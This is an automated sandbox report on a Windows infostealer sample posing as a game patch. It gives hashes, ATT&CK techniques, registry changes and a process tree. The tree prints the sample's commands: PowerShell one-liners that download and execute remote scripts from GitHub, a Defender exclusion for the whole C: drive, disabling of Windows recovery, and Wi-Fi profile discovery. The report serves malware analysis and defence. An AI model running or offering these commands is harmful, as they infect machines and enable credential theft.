585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
11s
max time network
16s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/08/2024, 07:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	2212	powershell.exe
17	3512	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3612	powershell.exe
3512	powershell.exe
2212	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4960	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
16	raw.githubusercontent.com
17	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3900	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
628	netsh.exe
1104	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4624	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3732	ipconfig.exe
4624	NETSTAT.EXE
464	ipconfig.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	Chameleon-Byfronpatch2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chameleon-Byfronpatch2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chameleon-Byfronpatch2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee404000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chameleon-Byfronpatch2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000004000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	Chameleon-Byfronpatch2.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3612	powershell.exe
3512	powershell.exe
2212	powershell.exe
3512	powershell.exe
3612	powershell.exe
2212	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe
Token: SeCreatePagefilePrivilege	2212	powershell.exe
Token: SeBackupPrivilege	2212	powershell.exe
Token: SeRestorePrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeSystemEnvironmentPrivilege	2212	powershell.exe
Token: SeRemoteShutdownPrivilege	2212	powershell.exe
Token: SeUndockPrivilege	2212	powershell.exe
Token: SeManageVolumePrivilege	2212	powershell.exe
Token: 33	2212	powershell.exe
Token: 34	2212	powershell.exe
Token: 35	2212	powershell.exe
Token: 36	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe
Token: SeCreatePagefilePrivilege	2212	powershell.exe
Token: SeBackupPrivilege	2212	powershell.exe
Token: SeRestorePrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeSystemEnvironmentPrivilege	2212	powershell.exe
Token: SeRemoteShutdownPrivilege	2212	powershell.exe
Token: SeUndockPrivilege	2212	powershell.exe
Token: SeManageVolumePrivilege	2212	powershell.exe
Token: 33	2212	powershell.exe
Token: 34	2212	powershell.exe
Token: 35	2212	powershell.exe
Token: 36	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe
Token: SeCreatePagefilePrivilege	2212	powershell.exe
Token: SeBackupPrivilege	2212	powershell.exe
Token: SeRestorePrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeSystemEnvironmentPrivilege	2212	powershell.exe
Token: SeRemoteShutdownPrivilege	2212	powershell.exe
Token: SeUndockPrivilege	2212	powershell.exe
Token: SeManageVolumePrivilege	2212	powershell.exe
Token: 33	2212	powershell.exe
Token: 34	2212	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 4624	2524	Chameleon-Byfronpatch2.exe	84
PID 2524 wrote to memory of 4624	2524	Chameleon-Byfronpatch2.exe	84
PID 2524 wrote to memory of 3612	2524	Chameleon-Byfronpatch2.exe	86
PID 2524 wrote to memory of 3612	2524	Chameleon-Byfronpatch2.exe	86
PID 2524 wrote to memory of 4816	2524	Chameleon-Byfronpatch2.exe	89
PID 2524 wrote to memory of 4816	2524	Chameleon-Byfronpatch2.exe	89
PID 2524 wrote to memory of 2212	2524	Chameleon-Byfronpatch2.exe	90
PID 2524 wrote to memory of 2212	2524	Chameleon-Byfronpatch2.exe	90
PID 2524 wrote to memory of 3512	2524	Chameleon-Byfronpatch2.exe	88
PID 2524 wrote to memory of 3512	2524	Chameleon-Byfronpatch2.exe	88
PID 2524 wrote to memory of 4420	2524	Chameleon-Byfronpatch2.exe	87
PID 2524 wrote to memory of 4420	2524	Chameleon-Byfronpatch2.exe	87
PID 4816 wrote to memory of 932	4816	cmd.exe	96
PID 4816 wrote to memory of 932	4816	cmd.exe	96
PID 3512 wrote to memory of 3244	3512	powershell.exe	97
PID 3512 wrote to memory of 3244	3512	powershell.exe	97
PID 2212 wrote to memory of 3544	2212	powershell.exe	98
PID 2212 wrote to memory of 3544	2212	powershell.exe	98
PID 3244 wrote to memory of 4864	3244	csc.exe	99
PID 3244 wrote to memory of 4864	3244	csc.exe	99
PID 3544 wrote to memory of 4224	3544	csc.exe	100
PID 3544 wrote to memory of 4224	3544	csc.exe	100
PID 2212 wrote to memory of 1104	2212	powershell.exe	104
PID 2212 wrote to memory of 1104	2212	powershell.exe	104
PID 2212 wrote to memory of 3584	2212	powershell.exe	106
PID 2212 wrote to memory of 3584	2212	powershell.exe	106
PID 3584 wrote to memory of 2464	3584	net.exe	107
PID 3584 wrote to memory of 2464	3584	net.exe	107
PID 2212 wrote to memory of 4960	2212	powershell.exe	108
PID 2212 wrote to memory of 4960	2212	powershell.exe	108
PID 2212 wrote to memory of 3180	2212	powershell.exe	109
PID 2212 wrote to memory of 3180	2212	powershell.exe	109
PID 2212 wrote to memory of 4428	2212	powershell.exe	110
PID 2212 wrote to memory of 4428	2212	powershell.exe	110
PID 4428 wrote to memory of 1928	4428	net.exe	111
PID 4428 wrote to memory of 1928	4428	net.exe	111
PID 2212 wrote to memory of 3732	2212	powershell.exe	112
PID 2212 wrote to memory of 3732	2212	powershell.exe	112
PID 2212 wrote to memory of 1392	2212	powershell.exe	113
PID 2212 wrote to memory of 1392	2212	powershell.exe	113
PID 2212 wrote to memory of 2424	2212	powershell.exe	115
PID 2212 wrote to memory of 2424	2212	powershell.exe	115
PID 2212 wrote to memory of 4624	2212	powershell.exe	116
PID 2212 wrote to memory of 4624	2212	powershell.exe	116
PID 2212 wrote to memory of 4804	2212	powershell.exe	117
PID 2212 wrote to memory of 4804	2212	powershell.exe	117
PID 2212 wrote to memory of 464	2212	powershell.exe	118
PID 2212 wrote to memory of 464	2212	powershell.exe	118
PID 2212 wrote to memory of 1036	2212	powershell.exe	119
PID 2212 wrote to memory of 1036	2212	powershell.exe	119
PID 2212 wrote to memory of 3900	2212	powershell.exe	120
PID 2212 wrote to memory of 3900	2212	powershell.exe	120
PID 2212 wrote to memory of 628	2212	powershell.exe	121
PID 2212 wrote to memory of 628	2212	powershell.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4624	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3612
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2i4mkpwa\2i4mkpwa.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98F4.tmp" "c:\Users\Admin\AppData\Local\Temp\2i4mkpwa\CSCA67194F6663D4135954AB988437276B5.TMP"
      4⤵
      PID:4864
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0suovvqz\0suovvqz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3544
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9961.tmp" "c:\Users\Admin\AppData\Local\Temp\0suovvqz\CSC7B7D72D1329743A59E4E29E7DDFD75E.TMP"
      4⤵
      PID:4224
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1104
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2464
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4960
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:3180
- - C:\Windows\system32\net.exe
